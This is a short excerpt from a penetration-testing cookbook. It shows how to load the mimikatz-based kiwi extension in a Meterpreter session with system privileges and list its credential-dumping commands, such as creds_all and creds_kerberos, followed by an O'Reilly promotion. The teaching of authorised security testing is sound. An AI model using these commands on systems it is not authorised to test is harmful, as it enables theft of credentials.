How to do it...

  1. In a Meterpreter session running with system privileges, we will start by using the load command to load the kiwi extension:
meterpreter > load kiwi Loading extension kiwi...  .#####. mimikatz 2.1.1 20170608 (x64/windows) .## ^ ##. "A La Vie, A L'Amour" ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)  '#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */Success.meterpreter >
  1. Now that we have loaded the extension, we will list all the available commands using the help kiwi command:
meterpreter > help kiwiKiwi Commands=============    Command                Description    -------                -----------    creds_all              Retrieve all credentials (parsed) creds_kerberos ...

Get Metasploit Penetration Testing Cookbook - Third Edition now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.